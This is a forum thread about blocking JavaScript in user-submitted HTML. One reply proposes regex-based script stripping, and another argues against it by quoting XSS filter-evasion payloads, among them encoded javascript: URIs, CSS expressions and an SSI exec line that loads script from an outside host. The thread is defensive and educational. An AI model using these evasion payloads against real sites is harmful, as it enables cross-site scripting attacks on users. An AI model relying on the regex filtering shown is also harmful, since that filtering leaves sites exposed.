SitePoint Sponsor

User Tag List

Results 1 to 4 of 4
  1. #1
    SitePoint Addict
    Join Date
    Jan 2005
    Location
    nyc
    Posts
    223
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    javascript function to disable inline javascript?

    Is it possible to use a javascript function in the head of a document, that will "disable" or "kill" any javascript that resides in the body of that document?

    My situation:
    I will let users write their own code. Then the code will be included in the body of a document.
    So for security reasons, I don't want any javascript that the users might write, maliciously or not, to be potentially risky or annoying.
    Rather than try to delete any javascript from their posted code, I had this idea: write in the head of the document that will include the code, a javascript function which will supercede any possible javascript in the body, and somehow disable it.

    Possible?

  2. #2
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,034
    Mentioned
    187 Post(s)
    Tagged
    2 Thread(s)

    user javascript input

    I think you should do this (if at all) server-side. What's to prevent someone from copying the page, altering or removing the javascript and submitting it?

  3. #3
    SitePoint Guru
    Join Date
    Apr 2006
    Posts
    802
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Parse the user's code on the server before you save it to a file.

    The simplest way is to use a regular expression to replace any scripts with comments:

    replace /\<script([^\>]*\>/gi with ' <!-- ' and
    /\< *\/ *script *\>/gi with ' -->';

    I'd also replace any /href *\= *(["'])javascript\:/gi with 'title= $1 '

    And you ought to prohibit any event attributes being set as
    anonymous functions;
    /(\<\w+[^\>]+)on(\w+) *\=)/gi with 'title='

    I'm sure you see where this is going...but suit yourself, there are
    plenty of sites on the internet, some of them are bound to be in
    bad neighborhoods..

  4. #4
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,034
    Mentioned
    187 Post(s)
    Tagged
    2 Thread(s)

    parse clean

    Actually, I was thinking more along the lines of wrapping the input in pre or code tags. Using a regex to filter is problematic. Especially in you are using cookies or sessions. XSS can be written to send info to a harvester file.
    Code:
    ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
    Code:
    '';!--"<XSS>=&{()}
    Code:
    <IMG SRC="javascript:alert('XSS');">
    Code:
    <IMG SRC=javascript:alert('XSS')>
    Code:
    <IMG SRC=JaVaScRiPt:alert('XSS')>
    Code:
    <IMG SRC=javascript:alert(&quot;XSS&quot;)>
    Code:
    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
    Code:
    <!--#exec cmd="/bin/echo '<SCRIPT
    SRC'"--><!--#exec cmd="/bin/echo
    '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
    Code:
    <XSS STYLE="xss:expression(alert('XSS'))">
    Code:
    <IMG SRC=&#38;#106;&#38;#97;&#38;#118;&#38;#97;&#38;#115;&#38;#99;&#38;#114;&#38;#105;&#38;#112;&#38;#116;&#38;#58;&#38;#97;&#38;#108;&#38;#101;&#38;#114;&#38;#116;&#38;#40;&#38;#39;&#38;#88;&#38;#83;&#38;#83;&#38;#39;&#38;#41;>
    Code:
    <DIV STYLE="background-image: url(javascript:alert('XSS'))">
    Code:
    <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
    etc etc etc. For the much longer XSS Cheat Sheet with even more examples of filter evasion: http://ha.ckers.org/xss.html


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •